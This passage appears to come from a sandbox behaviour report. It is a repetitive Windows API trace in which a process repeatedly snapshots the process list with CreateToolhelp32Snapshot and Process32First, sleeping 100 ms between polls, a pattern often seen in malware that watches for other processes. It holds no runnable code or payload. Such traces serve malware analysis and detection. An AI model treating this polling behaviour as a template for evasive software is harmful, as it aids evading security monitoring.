th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.577] Sleep (dwMilliseconds=0x64) [0282.625] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0282.641] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.759] Sleep (dwMilliseconds=0x64) [0282.812] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0282.822] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.974] Sleep (dwMilliseconds=0x64) [0283.030] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0283.064] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.135] Sleep (dwMilliseconds=0x64) [0283.156] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0283.166] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.284] Sleep (dwMilliseconds=0x64) [0283.348] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0283.365] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.478] Sleep (dwMilliseconds=0x64) [0283.532] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0283.545] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.661] Sleep (dwMilliseconds=0x64) [0283.675] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0283.685] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.753] Sleep (dwMilliseconds=0x64) [0283.764] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0283.774] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0283.956] Sleep (dwMilliseconds=0x64) [0284.019] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0284.141] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.708] Sleep (dwMilliseconds=0x64) [0284.718] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0284.733] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.811] Sleep (dwMilliseconds=0x64) [0284.876] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0284.895] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0284.969] Sleep (dwMilliseconds=0x64) [0285.014] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0285.023] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.235] Sleep (dwMilliseconds=0x64) [0285.248] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0285.258] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.339] Sleep (dwMilliseconds=0x64) [0285.390] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0285.446] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.520] Sleep (dwMilliseconds=0x64) [0285.562] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0285.576] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.680] Sleep (dwMilliseconds=0x64) [0285.834] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0285.910] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0285.985] Sleep (dwMilliseconds=0x64) [0286.047] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0286.065] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.314] Sleep (dwMilliseconds=0x64) [0286.359] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0286.369] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.510] Sleep (dwMilliseconds=0x64) [0286.545] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0286.556] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.681] Sleep (dwMilliseconds=0x64) [0286.734] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0286.743] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.963] Sleep (dwMilliseconds=0x64) [0287.034] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0287.101] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.226] Sleep (dwMilliseconds=0x64) [0287.241] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0287.253] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.320] Sleep (dwMilliseconds=0x64) [0287.325] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0287.338] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.458] Sleep (dwMilliseconds=0x64) [0287.499] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0287.510] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0287.886] Sleep (dwMilliseconds=0x64) [0287.983] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0287.993] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.331] Sleep (dwMilliseconds=0x64) [0288.418] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0288.428] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.676] Sleep (dwMilliseconds=0x64) [0288.824] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0288.853] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0288.994] Sleep (dwMilliseconds=0x64) [0289.048] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0289.064] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.303] Sleep (dwMilliseconds=0x64) [0289.355] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0289.367] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.478] Sleep (dwMilliseconds=0x64) [0289.516] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0289.529] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.596] Sleep (dwMilliseconds=0x64) [0289.608] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0289.618] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0289.797] Sleep (dwMilliseconds=0x64) [0289.878] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0289.895] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.048] Sleep (dwMilliseconds=0x64) [0290.064] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0290.080] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.207] Sleep (dwMilliseconds=0x64) [0290.264] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0290.274] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.492] Sleep (dwMilliseconds=0x64) [0290.548] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0290.615] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.725] Sleep (dwMilliseconds=0x64) [0290.732] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0290.749] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.880] Sleep (dwMilliseconds=0x64) [0290.937] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0290.952] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.088] Sleep (dwMilliseconds=0x64) [0291.230] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0291.333] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.477] Sleep (dwMilliseconds=0x64) [0291.613] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0291.724] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0291.945] Sleep (dwMilliseconds=0x64) [0291.995] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0292.019] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.101] Sleep (dwMilliseconds=0x64) [0292.155] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0292.212] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.317] Sleep (dwMilliseconds=0x64) [0292.354] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0292.365] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.433] Sleep (dwMilliseconds=0x64) [0292.469] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0292.480] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.546] Sleep (dwMilliseconds=0x64) [0292.589] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0292.706] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0292.957] Sleep (dwMilliseconds=0x64) [0293.018] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0293.036] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.165] Sleep (dwMilliseconds=0x64) [0293.171] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0293.190] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.424] Sleep (dwMilliseconds=0x64) [0293.479] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0293.582] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.751] Sleep (dwMilliseconds=0x64) [0293.796] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0293.813] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0293.898] Sleep (dwMilliseconds=0x64) [0293.951] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0294.131] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.205] Sleep (dwMilliseconds=0x64) [0294.217] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x224c [0294.229] Process32First (in: hSnapshot=0x224c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.314] Sleep (dwMilliseconds=0x64) [0294.357] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0294.371] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.516] Sleep (dwMilliseconds=0x64) [0294.607] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x101c [0294.620] Process32First (in: hSnapshot=0x101c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.742] Sleep (dwMilliseconds=0x64) [0294.792] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x101c [0294.806] Process32First (in: hSnapshot=0x101c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0294.979] Sleep (dwMilliseconds=0x64) [0295.071] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b08 [0295.084] Process32First (in: hSnapshot=0x1b08, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.378] Sleep (dwMilliseconds=0x64) [0295.480] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0295.492] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.709] Sleep (dwMilliseconds=0x64) [0295.792] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xde0 [0295.803] Process32First (in: hSnapshot=0xde0, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0295.956] Sleep (dwMilliseconds=0x64) [0296.071] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x227c [0296.082] Process32First (in: hSnapshot=0x227c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.288] Sleep (dwMilliseconds=0x64) [0296.370] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x227c [0296.382] Process32First (in: hSnapshot=0x227c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.582] Sleep (dwMilliseconds=0x64) [0296.637] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x227c [0296.646] Process32First (in: hSnapshot=0x227c, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0296.767] Sleep (dwMilliseconds=0x64) [0296.786] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0296.800] Process32First (in: hSnapshot=0x21f8, lppe=0x1026fe20 | out: lppe=0x1026fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0297.034] 